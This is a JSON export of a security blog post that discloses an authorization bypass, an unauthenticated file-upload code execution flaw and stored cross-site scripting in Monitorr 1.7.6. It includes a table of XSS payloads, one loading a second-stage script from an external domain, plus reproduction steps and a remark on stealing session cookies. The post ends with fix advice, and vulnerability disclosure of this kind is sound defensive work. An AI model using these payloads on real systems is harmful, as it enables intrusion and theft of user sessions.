{"id":278,"date":"2020-09-12T14:29:23","date_gmt":"2020-09-12T14:29:23","guid":{"rendered":"https:\/\/lyhinslab.org\/?p=278"},"modified":"2021-05-13T16:10:15","modified_gmt":"2021-05-13T16:10:15","slug":"how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6","status":"publish","type":"post","link":"https:\/\/lscp.llc\/index.php\/2020\/09\/12\/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6\/","title":{"rendered":"How White-Box hacking works: Authorization Bypass and Remote Code Execution in Monitorr 1.7.6"},"content":{"rendered":"\n

Well, we pwned one more piece of software. Who cares? Nah, nobody. Alright, now user “nobody” – see how we did that. <\/p>\n\n\n\n

Monitorr 1.7.6:<\/p>\n\n\n\n

  1. Was written on PHP, that is a good sign for us attackers.<\/li>
  2. Has 366 stars on Github. <\/li>
  3. Designed to do monitoring. We like this kind of software. <\/li><\/ol>\n\n\n\n

    Auth Bypass<\/h4>\n\n\n\n

    Classical situation – an attacker can access installation panel after the actual installation. <\/p>\n\n\n\n

    \"\"
    Monitorr\/assets\/config\/_installation\/_register.php<\/figcaption><\/figure>\n\n\n\n

    Create a new user and authorize on behalf of this user. <\/p>\n\n\n\n

    Remote Code Execution<\/h4>\n\n\n\n

    The vulnerable code resides in \u201cupload.php\u201d file. The only check that is done on the uploaded file is getimagesize() function:<\/p>\n\n\n\n

    \"\"<\/figure>\n\n\n\n

    This function can be easily bypassed by prepending standard image properties to an executable file. In this example, a payload mimics a GIF image:<\/p>\n\n\n\n

    \"\"<\/figure>\n\n\n\n

    After size check is passed, the file is successfully uploaded:<\/p>\n\n\n\n

    \"\"<\/figure>\n\n\n\n

    So we can see our PHP code executed:<\/p>\n\n\n\n

    \"\"<\/figure>\n\n\n\n

    It\u2019s important to emphasize that no authentication checks are done in the upload.php script.<\/p>\n\n\n\n

    Cross-Site Scripting (XSS)<\/strong><\/p>\n\n\n\n

    Two stored XSS have been found on service configuration tab at Monitorr settings page. Despite the length restriction, a malicious actor still can experience a full-feautered XSS attack by loading the second-stage payload from an external short domain like 14.rs<\/a> . <\/p>\n\n\n\n

    Form field<\/td>Payload<\/td><\/tr>
    Service URL<\/td>><payload><a href=\"<\/code><\/td><\/tr>
    Service Title<\/td><embed src=\/\/14.rs><\/code><\/td><\/tr>
    Service Image<\/td>“onerror=”alert(document.location)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
    \"\"<\/figure>\n\n\n\n

    Steps to Reproduce
    1. Log in the application
    2. Navigate to Service configuration tab
    3. Enter the payload
    4. Save changes and observe the javascript alert box triggered at the main Monitorr page.<\/p>\n\n\n\n

    By the way, session cookies don’t have HttpOnly flag, so we can steal authorization cookies. <\/p>\n\n\n\n

    \"\"<\/figure>\n\n\n\n

    Fix<\/h4>\n\n\n\n

    Unfortunately, the Monitorr command decided to do not to fix these vulnerabilities. To do not have the same issues – ensure, that your software:<\/p>\n\n\n\n

    1. Deletes the installation files right after the installation.<\/li>
    2. Does input sanitization and output encoding of user input.<\/li>
    3. Checks file uploads properly. <\/li><\/ol>\n\n\n\n

      LL advises to all the researchers do not break real applications<\/em> illegally. This fun leads to broken businesses and lives, and, most likely, will not make an attacker really rich.<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"

      Well, we pwned one more piece of software. Who cares? Nah, nobody. Alright, now user “nobody” – see how we did […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-278","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/posts\/278","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/comments?post=278"}],"version-history":[{"count":0,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/posts\/278\/revisions"}],"wp:attachment":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/media?parent=278"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/categories?post=278"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/tags?post=278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}